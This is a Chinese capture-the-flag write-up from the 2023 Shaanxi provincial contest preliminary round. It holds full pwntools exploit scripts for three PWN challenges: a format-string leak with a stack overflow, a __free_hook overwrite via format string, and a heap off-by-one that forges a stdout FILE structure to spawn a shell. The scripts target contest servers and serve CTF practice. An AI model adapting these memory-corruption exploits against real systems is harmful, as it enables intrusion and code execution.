陕西省省赛 2023 初赛 WP

出了3道PWN，两个一血一个二血，总排名不前

线下旅游梦再次破灭（

这里还是只贴自己打的题吧

PWN

陕西游玩

格串泄露ELF基址，栈溢出ret2text

#!/usr/bin/python2
# -*- coding: UTF-8 -*-
from pwn import *

io = remote('121.196.192.181', 10001)
# io = process('./pwn')
context.binary = 'pwn'

ru          = lambda x          : io.recvuntil(x, drop = True)
sa          = lambda a, b       : io.sendafter(a, b)
sla         = lambda a, b       : io.sendlineafter(a, b)
ia          = lambda            : io.interactive()
pie_os      = lambda x          : pie_base + x

sla('3.xi_an\n', '2')
sa('Welcome to Terra_Cotta_Warriors\n', '%11$p\n\x00')
pie_base = int(ru('\n'), 16) - (0x5649512a03a0 - 0x56495129f000)
sla('Your choice :\n', '1')
sa('Welcome to Huashan_Mountain\n', flat({0x28: pie_os(0x000000000000129A)}))
ia()

easy_printf

bss段格串，泄露完地址后找个栈上二级指针打 free_hook

#!/usr/bin/python2
# -*- coding: UTF-8 -*-
from pwn import *

io = remote('gamebox.yunyansec.com', 23852)
# io = process('./pwn')
context.binary = 'pwn'
libc = ELF('libc.so.6', checksec = False)

ru          = lambda x          : io.recvuntil(x, drop = True)
sa          = lambda a, b       : io.sendafter(a, b)
libc_os     = lambda x          : libc_base + x
pie_os      = lambda x          : pie_base + x
libc_sym    = lambda x          : libc_os(libc.sym[x])
ia          = lambda            : io.interactive()

def fmt(x):
    sa('What do you want to say?\n', x)

sa('Do you know who the best pwner is?\n', 'TokameinE_is_the_best_pwner\x00')
fmt('%9$p,%8$p,%29$p,')
pie_base = int(ru(','), 16) - (0x55a8cb7312f7 - 0x55a8cb730000)
stack_addr = int(ru(','), 16)
s_addr = stack_addr - (0x7ffc7dbc5070 - 0x7ffc7dbc5100)
libc_base = int(ru(','), 16) - (0x7f1fe99ae840 - 0x7f1fe998e000)
fh_addr = libc_sym('__free_hook')
one = libc_os(0x4527a)
pld = flat([
    '%',
    str(int(hex(fh_addr)[-4:], 16)),
    'c',
    '%10$hn\x00'
])
fmt(pld)
pld = flat([
    '%',
    str(int(hex(s_addr+2)[-2:], 16)),
    'c',
    '%8$hhn\x00'
])
fmt(pld)
pld = flat([
    '%',
    str(int(hex(fh_addr)[-8:-4], 16)),
    'c',
    '%10$hn\x00'
])
fmt(pld)

pld = flat([
    '%',
    str(int(hex(s_addr+4)[-2:], 16)),
    'c',
    '%8$hhn\x00'
])
fmt(pld)
pld = flat([
    '%',
    str(int(hex(fh_addr)[-12:-8], 16)),
    'c',
    '%10$hn\x00'
])
fmt(pld)

pld = flat([
    '%',
    str(int(hex(one)[-4:], 16)),
    'c',
    '%28$hn\x00'
])
fmt(pld)
pld = flat([
    '%',
    str(int(hex(s_addr)[-2:], 16)),
    'c',
    '%8$hhn\x00'
])
fmt(pld)
pld = flat([
    '%',
    str(int(hex(fh_addr+2)[-2:], 16)),
    'c',
    '%10$hhn\x00'
])
fmt(pld)
pld = flat([
    '%',
    str(int(hex(one)[-8:-4], 16)),
    'c',
    '%28$hn\x00'
])
fmt(pld)
pld = flat([
    '%',
    str(int(hex(fh_addr+4)[-2:], 16)),
    'c',
    '%10$hhn\x00'
])
sleep(0.1)
fmt(pld)
pld = flat([
    '%',
    str(int(hex(one)[-12:-8], 16)),
    'c',
    '%28$hn\x00'
])
sleep(0.1)
fmt(pld)
pld = flat([
    '%',
    str(int(hex(pie_os(0x0000000000004020)+0x300)[-4:], 16)),
    'c',
    '%10$hn\x00'
])
sleep(0.1)
fmt(pld)
ia()

Information_System

随机数预测，off by one，伪造 _IO_2_1_stdout_ （感觉也不是很难，到比赛结束都还是唯一解我是没想到的

// gcc -o get get.c
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define __int64 long long
int main() {
	unsigned int v0 = time(0LL);
	srand((100 * ((__int64)((((__int64)0xA3D70A3D70A3D70BLL * (unsigned __int128)v0) >> 64) + v0) >> 6)) ^ 0xDEADBEEF);
	int seed = rand();
	srand(seed);
	int v1 = rand();
	int v2 = rand();
	printf("%u\n", (v1 ^ v2) >> 6);
}

#!/usr/bin/python2
# -*- coding: UTF-8 -*-
from pwn import *

exe = './pwn'
io = remote('121.196.192.181', 10002)
# io = process('./pwn')
context.binary = 'pwn'
libc = ELF('libc.so.6', checksec = False)

ru          = lambda x          : io.recvuntil(x, drop = True)
sa          = lambda a, b       : io.sendafter(a, b)
sla         = lambda a, b       : io.sendlineafter(a, b)
rc          = lambda n          : io.recv(n)
ia          = lambda            : io.interactive()
uu64        = lambda x          : u64(x.ljust(8, '\x00'))
libc_os     = lambda x          : libc_base + x
heap_os     = lambda x          : heap_base + x
libc_sym    = lambda x          : libc_os(libc.sym[x])

def menu(choice):
    sla('Your choice: ', str(choice))

def add(idx, choice, content):
    menu(1)
    sla('Enter the index: ', str(idx))
    sla('Your choice: ', str(choice))
    sa('Enter the information: ', content)

def delete(idx):
    menu(2)
    sla('Enter the index: ', str(idx))

def show(idx):
    menu(3)
    sla('Enter the index: ', str(idx))

get = process('./get')
sa('Input your name: ', 'a' * 0x10 + 'root\x00\n')
sa('Input your password: ', 'a' * 0x10 + 't00r\x00\n')
vc = int(get.recvuntil('\n'))
sla('Enter the verification code: ', str(vc))
sla('Input your key: ', '40')

for i in range(9):
    add(i, 3, 'a\n')
for i in range(8):
    delete(i)
for i in range(7):
    add(i, 3, 'a\n')
add(7, 2, 'a' * 0x10 + '\n')
show(7)
ru('a' * 0x10)
heap_base = uu64(rc(6)) - (0x56265a329f0a - 0x56265a328000)
key = heap_base >> 12

add(9, 2, '\n')
show(9)
libc_base = uu64(rc(6)) - (0x7f114999bc0a - 0x7f1149782000)
sys_addr = libc_sym('system')
io_list_all = libc_os(0x7f17c64f1680 - 0x7f17c62d7000)
jump_table = libc_os(0x2160c0)
fake_file_addr = heap_os(0x5561bfe3f720+0x10-0x5561bfe3d000)
fake_file = flat({
    0: '  sh',
    0x78: sys_addr,
    0x88: heap_base + 0x100,
    0xa0: fake_file_addr + 0x10,
    0xc0: 0,
    0xd8: jump_table - 0,
    0xf0: fake_file_addr + 0x10,
}, filler = '\x00')
add(10, 3, fake_file + '\n')
for i in range(7):
    delete(i)
add(0, 1, 'b\n')
add(1, 1, 'c\n')
add(2, 1, 'd\n')
add(3, 1, 'e\n')
add(4, 1, 'f\n')
delete(1)
add(1, 1, 'a' * 0x108 + '\x60')
delete(2)
delete(4)
delete(3)
key += 2
stdout = libc_os(0x7fc85be0e780 - 0x7fc85bbf4000)
add(5, 2, flat({0x110: key ^ stdout}) + '\n')
add(6, 1, 'a\n')
add(11, 1, fake_file+'\n')
ia()

babycvm

比赛时已经能劫持 run 函数的返回地址为任意值了，可惜没有泄露出有用的地址，只泄露出了 stack 和 vdso ，但感觉没什么用，先留个坑等以后有空再来看吧